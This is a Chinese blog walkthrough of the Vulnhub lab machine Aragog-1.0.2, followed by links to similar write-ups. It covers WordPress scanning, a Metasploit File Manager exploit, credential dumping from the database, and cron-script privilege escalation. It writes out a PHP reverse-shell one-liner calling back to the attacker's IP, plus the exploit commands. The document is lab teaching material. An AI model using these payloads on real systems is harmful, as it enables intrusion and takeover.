【Vulnhub】之Aragog-1.0.2

最新推荐文章于 2024-10-25 21:34:25 发布
最新推荐文章于 2024-10-25 21:34:25 发布
阅读量758 收藏 2
点赞数 1
分类专栏: 靶机 vulnhub 网络安全 文章标签: 网络安全 安全性测试 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zg_111/article/details/130077957
版权
网络安全 同时被 3 个专栏收录
19 篇文章 0 订阅
订阅专栏
靶机
11 篇文章 0 订阅
订阅专栏
vulnhub
9 篇文章 2 订阅
订阅专栏

一、 部署方法

  1. 在官网上下载靶机ova环境:https://download.vulnhub.com/harrypotter/Aragog-1.0.2.ova
  2. 使用VMware搭建靶机环境
  3. 攻击机使用VMware上搭建的kali
  4. 靶机和攻击机之间使用NAT模式,保证靶机和攻击机放置于同一网段中。

二、 靶机下载安装

靶机下载与安装参考之前文章:搭建Vulnhub靶机详细步骤

三、渗透测试

1. 信息收集

arp-scan -l

扫描网段信息

在这里插入图片描述

发现靶机IP:192.168.15.135

使用 nmap 对靶机IP进行深度扫描

nmap -A -T4 -p- 192.168.15.135

在这里插入图片描述

nmap扫描发现靶机对外开放了22和80端口,浏览器去访问下web服务

在这里插入图片描述

发现只有一张图片,再使用 dirsearch 尝试扫描下网站目录

dirsearch -u 192.168.15.135

在这里插入图片描述

浏览器访问下扫描出来可访问的网站目录

在这里插入图片描述
在这里插入图片描述

点击Blog发现跳转到了wordpress.aragog.hogwarts

在这里插入图片描述

我们在hosts文件中添加域名解析:192.168.15.135 wordpress.aragog.hogwarts

vi /etc/hosts

在这里插入图片描述

保存退出后,重新载入发现可以正常访问到页面

在这里插入图片描述

浏览了下页面,发现没有可利用的点,但是我们能发现这个站点是利用wordpress搭建的

接下来我们使用wpscan枚举一下(ps:wpscan是一个扫描WordPress漏洞的扫描器)

去注册个免费的账号获取api-token:https://wpscan.com/(需要翻墙,否则无法注册)

wpscan --api-token=获取到的免费api-token --url=http://192.168.15.135/blog -e p --plugins-detection aggressive

在这里插入图片描述

扫描到3个File Manager的漏洞

2. 漏洞利用

使用msf进行漏洞利用

msfconsole                       #启动msf
search file manager wordpress    #查找漏洞相关exp
use 1                            #使用第1个exp
show options                     #查看需要设置的参数
set RHOSTS 192.168.15.135        #设置靶机IP
set TARGETURI /blog              #设置路径
set LHOST 192.168.15.131         #设置攻击IP
run                              #启动攻击

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

成功获取到shell

3. 提权

为方便操作,首先使用python打开交互式

python3 -c 'import pty;pty.spawn("/bin/bash")'

wordpress搭建的网站数据库账号密码会记录在/etc/wordpress目录里的config-default.php 文件里,查看后发现了数据库的root密码

在这里插入图片描述

使用root密码连接数据库,我们在wordpress数据库下,wp_users表中查到一条登录记录

mysql -u root -p         #连接数据库
show databases;          #查看所有数据库
use wordpress;          #使用wordpress数据库
show tables;            #查看wordpress数据库中所有表
select * from wp_users;  #查看wp_users表内容

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

解密后我们得到了hagrid98账户的密码:password123

在这里插入图片描述

尝试ssh登录

ssh hagrid98@192.168.15.135

在这里插入图片描述

成功登录,并在当前目录下发现了第一个魂器

在这里插入图片描述

继续查看目录文件,我们在/opt目录下发现一个隐藏的脚本文件:.backup.sh

在这里插入图片描述

查看脚本文件内容是将上传的文件复制到tmp目录里,应该是定时执行

所以我们到目录/tmp下写一个反弹shell的php脚本,然后修改.backup.sh脚本内容

<?php $sock=fsockopen("192.168.15.131",7777);exec("/bin/sh -i <&3 >&3 2>&3"); ?>

在这里插入图片描述

在kali中开启7777端口监听

nc -lnvp 7777

在这里插入图片描述

等待片刻,成功获取到root权限,并在root目录下发现了第二个魂器

在这里插入图片描述
完!

网络安全小时光
关注
专栏目录
(20-3-02)基于《哈利·波特》系列图书内容的问答系统:LangChain多文档检索器(02)Prompt Template(提示模板)+Retriever Chain(检索链)+格式化输出
码农三叔
05-22 962
在自然语言处理(NLP)和聊天机器人的设计中,"Prompt Template"(提示模板)是一个预定义的文本格式,用于引导或激发大型语言模型(LLM)生成特定的回答或输出。(2)下面的代码使用了一个名为 max_marginal_relevance_search 的最大边际相关性搜索方法,它是向量数据库 vectordb 的一部分,用于执行一种特定的检索任务,旨在找到与给定问题最相关的文档或文档段落。(2)定义函数 llm_ans ,用于处理用户查询,生成模型的回答,并计算整个处理过程所需的时间。
靶机无法获得IP地址, 该怎么办?
墨痕诉清风的博客
07-18 1706
靶机的作者通常更建议我们使用VirtualBox来运行靶机,而不是VMWare家的虚拟化产品。如果靶机启动后无法获得IP地址(扫描无法发现靶机IP),请首先使用虚拟机的重启功能(Host+R)重新启动靶机,并在重启的黑屏阶段。在学习过程中,也有部分同学遇到了一个有些共性的问题,那就是靶机启动后无法自动获得IP地址。点击键盘中字母“e”,找到内核加载的配置行,如下图所示,将其修改为单用户启动模式。将配置文件中的网卡名称修改为当前的正确名称,并确定DHCP配置启动。保存配置修改,重启计算机正常进入系统!...
靶机ARAGOG (1.0.2)
Tswcbyy_hp的博客
07-21 477
实验环境 主机 ip 攻击机 192.168.48.128 靶机 192.168.48.136 攻击过程 信息收集 扫描网段,找到目标靶机的IP地址 详细扫描端口,发现打开了两个端口,22和80 有80端口,肯定有个网站,在浏览器打开网站 只有一个霍格瓦茨魔法学院大战图 dirb扫描网络,找到不少地址 漏洞利用 打开第一个目录blog 看到的是wordpress的blog网站 点击notice,提示说未知的host 可以看到除了主页以外,其余所有的网站都要访问这个host
VulnHub靶场】——HARRYPOTTER第一部: ARAGOG (1.0.2)
Demo不是emo的博客
09-30 3384
​ 今天的博客内容是HARRYPOTTER: ARAGOG (1.0.2)教程(简单难度),靶场环境来源于VulnHub,该网站有很多虚拟机靶场,靶场平台入口在这,推荐大家使用,大家进去直接搜索HARRYPOTTER: ARAGOG (1.0.2)就能下载今天的靶场了,也可以找我拿,开始对今天靶场的介绍 ​
HarryPotter第一部—Aragog-1.0.2
weixin_47311099的博客
01-13 1350
Aragog 是 3 HarryPotter VM 系列中的第一个 VM,您需要在其中找到隐藏在机器内的 2 个魂器(哈利波特系列的 3 个 VM 中总共隐藏了 8 个魂器)并最终击败 Voldemort。 信息收集 nmap扫描 nmap -sC -sV 192.168.210.148 IP地址靶机登录界面已经给出 根据扫描结果可得22ssh ,80http ​ 网站信息收集 只有一张图片 爆破一下网站目录 ​ dirb http://192.168.210.148 爆出来一个blog 页面有
vulnhub之 HarryPotter: Aragog (1.0.2)
qwweggfe的博客
08-30 386
靶机ip;192.168.181.145 kali ip: 192.168.181.129 首先进行ip扫描 打开网页进行查看 查看开启哪些端口 nmap -sC -sV 192.168.181.145 --min-rate=2000 -d 对目录进行扫描 打开/blog页面 发现notice无法进行跳转,修改/etc/hosts文件 然后在kali打开 ...
VulnHub_HarryPotter:Aragog (1.0.2)靶机
学术渣渣的博客
08-01 1613
靶机介绍 下载地址:https://www.vulnhub.com/entry/harrypotter-aragog-102,688/ 作者Mansoor R在VulnHub上上传了哈利波特系列,这个系列有三个靶机,以哈利波特为故事背景,玩家需要找到这三个靶机中的共8个魂器,打败伏地魔!这就冲起来! 首先是第一个靶机Aragog,以《哈利波特·密室》中的海格饲养的大蜘蛛阿拉戈命名,题目中提示这个靶机里面有两个魂器。 渗透过程 从VlunHub上下载靶机,在virtualbox上打开,设置网络为桥接。 打开
hackthebox - Aragog (考点:ftp & xxe攻击 & 修改php代码提权)
冬萍子癸水
05-30 526
1 扫描 21想到ftp进去找东西,都提示了匿名可进,里面有个test文件,好直白。。 22想到可能有ssh登录 80进web信息搜集 C:\root> nmap -A 10.10.10.78 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-29 23:03 EDT Nmap scan report for 10.10.10.78 Host is up (0.25s latency). Not shown: 872 closed ports, 12
Aragog-1.0.2靶机
ybkj6666的博客
11-03 198
使用arp-scan找目标ip,这边可以得知我们的目标ip为192.168.187.165输入命令: 发现了2个端口开放输入命令: 这边没有扫描到udp端口输入命令: 输入命令: 但是没有扫描到扫描可利用的漏洞点页面就是一张图片(哈利波特可还行)使用dirsearch和gobuster两个工具进行目录爆破输入命令: 这里扫描到了几个目录,等下去看看怎么个事输入命令: 我们在查看这个blog目录的时候,发现跳转到了新的页面。如果页面显示不正常的话,可能是页面没有解析的原因,就像下图这样此时我们需要以root的
渗透 | 靶机Aragog-1.0.2本地定时执行脚本提权到root
DdddddXxxxx的博客
05-06 1222
渗透 | 靶机Aragog-1.0.2本地定时执行脚本提权到root
看完这篇 教你玩转渗透测试靶机Vulnhub——HarryPotter:Aragog(1.0.2)
Aluxian_的博客
07-31 723
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。PS:这个是HarryPotter(哈利波特)系列一共有三个靶机,先来第一个Aragog老样子需要获得root权限找到flag(这里是魂器)即可。这个靶机难度高,主要i是最后得提权吧1.信息收集获取ip地址 和端口信息web等2.数据库的基本操作 查询语句python3开启交互 以及开临时网页(最基本的讲过很多次了)3.wpscan。
harrypotter1-aragog靶机攻略
qq_58683895的博客
10-25 525
新人打靶机,主要突破点在wpscan的漏洞扫描,以及msf获取shell,后面猜测使用定时脚本
HarryPotter: Aragog (1.0.2)靶场渗透
最新发布
zhongyuekang820的博客
10-25 1298
具有可扩展的插件系统,允许用户自定义检测规则和添加新的检测模块,它拥有超过1000个插件(如在2024 - 08 - 17的搜索结果提到有超过1000个插件,每个插件能识别不同的东西),每个插件都能识别不同的内容,还能标识版本号,电子邮件地址,账户ID,Web框架模块,SQL错误等。如果连接成功,$sock将包含一个文件指针,指向该连接。7,或者我们使用针对wordpress漏洞的扫描器WPScan,可以扫描出wordpress的版本,主题,插件,后台用户以及爆破后台用户密码等,加上。
Vulnhub靶机】HarryPotter-Aragog-1.0.2 漏洞复现
weixin_65900584的博客
02-26 1304
学习如何对 靶机 HarryPotter-Aragog-1.0.2 进行提权
HarryPotter-Aragog 三部曲之第一部 靶场记录
m0_52729465的博客
08-04 120
5、WordPress搭建的网站默认数据库账号密码会记录在/etc/wordpress目录里的config-default.php 文件中,在里面找到了数据库的账号密码,进行连入;6、在hagrid98账号下我们拿到了第一个horcrux,在目录中搜寻的过程中,找到一个.backup.sh文件,查看发现脚本文件内容是将上传的文件复制到tmp目录里,应该是定时执行。2、使用dirb来扫描网站,扫出了/blog和/blog/wp-login,发现页面显示不正常,需要在/etc/hosts添加域名解析。
靶机11:Aragog-1.0.2
wj33333的博客
10-31 82
1.arp-scan -l扫描,寻找靶机2.nmap扫描端口查看80端口3.dirsearch 扫描目录访问WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。那么思路就是找到这个版本的WordPress有什么插件的漏洞。
Vulnhub 靶机实战系列:DC -3网站管理员账号密码和系统提权
weixin_50815573的博客
03-03 4616
Vulnhub 靶机实战系列:DC -3网站管理员账号密码和系统提权 搭建测试靶机 下载地址:DC: 3.2 ~ VulnHub靶机DC-3 ip:192.168.1.106(NAT连接) 攻击机kali linux ip:192.168.1.237 信息收集 使用:nmap -sP 192.168.0.0/24 进行扫描找到目标靶机 对目标靶机进行端口扫描 利用nmap对目标主机进行端口扫描,发现开放端口:80 使用命令:nmap -A -p- -T4 192.168.1.106
渗透测试-vulnhub靶机 joker
2301_79441074的博客
11-23 338
kali配置代理 ,bp base64加密密码爆破,lxd提权
vulnhub靶机DC-1
cyzCc的博客
02-15 1025
1.启动DC1靶机发现没有登录密码 2.信息收集 主机发现,由于是与主机nat连接,所以需要找到dc1的IP地址 dc1的Mac地址是 nmap -sP 192.168.211.0/24 所以dc1 靶机的ip地址是192.168.211.133 扫描主机上开启的服务 nmap -A 192.168.211.133 -p 1-65535 发现目标开启了22端口和80端口 22端口考虑ssh...
Vulnhub靶机渗透测试实战(一):DC-1(入门)
热门推荐
weixin_41038469的博客
03-11 2万+
关于Vulnhub Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。 新手入门DC-1: 下载地址: https://www.vulnhub.com/entry/dc-1-1,292/ 主机渗透系统: macOS10.13 安装好虚拟机后挂载Virtualbox运行 第一次进行渗透实战演练,打开虚拟机后发现需要登录密码,一脸懵逼。翻查网页上的介绍才知道,就是不...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值